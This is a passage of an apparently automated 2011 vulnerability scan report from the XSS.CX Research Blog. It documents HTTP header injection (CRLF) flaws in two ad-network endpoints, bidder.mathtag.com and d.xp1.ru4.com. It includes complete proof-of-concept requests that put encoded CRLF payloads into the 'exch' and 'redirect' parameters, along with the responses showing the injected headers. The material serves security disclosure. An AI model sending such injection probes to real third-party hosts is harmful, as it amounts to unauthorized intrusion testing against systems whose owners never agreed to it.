Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Sun, 07-Mar-2010 01:46:23 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2; expires=Thu, 26-Apr-2012 17:46:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=2d004
42b2b1e70c1_822109-LFVxM-0; expires=Thu, 26-Apr-2012 17:46:24 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.9. http://bidder.mathtag.com/notify [exch parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bidder.mathtag.com
Path:	/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 7dcd7%0d%0a8fa3617fb5d was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=7dcd7%0d%0a8fa3617fb5d&id=5aW95q2jLzEvTmpObE1tTTNOemd0WmpObE1TMDBaREF5TFRobFpUSXRNall4WkdaaE5qUTRORE5rL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81OTk1NjQ5Nzk0ODgwMDgzMi8xMTEwMjgvMTAyMDY1LzIvU2dGY0lYUXYwMXVjbks3RkRwQ25mdnlnLS1lS0VVQnZ5aG5qbHVuc1Nmby8/6s9QhZvS3kFDhwEJWzQmPIkqX1k&price=5.163917 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=9:1297862322|3:1299090747|2:1299285586|5:1297863542|10001:1297818481|1:1297862934; ts=1299429431; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 404 Not found
Date: Mon, 07 Mar 2011 01:39:11 GMT
Server: MMBD/3.4.5.1
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 7dcd7
8fa3617fb5d
x-mm-host: ewr-bidder-x4
Connection: keep-alive

Request not found

1.10. http://d.xp1.ru4.com/activity [redirect parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload fae6a%0d%0afc39cba1417 was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=fae6a%0d%0afc39cba1417&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=KH-00000000549735899; M62795-52786=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 07 Mar 2011 01:49:48 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://fae6a
fc39cba1417?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

Report generated by XSS.CX Research Blog at Tue Mar 08 07:07:07 CST 2011.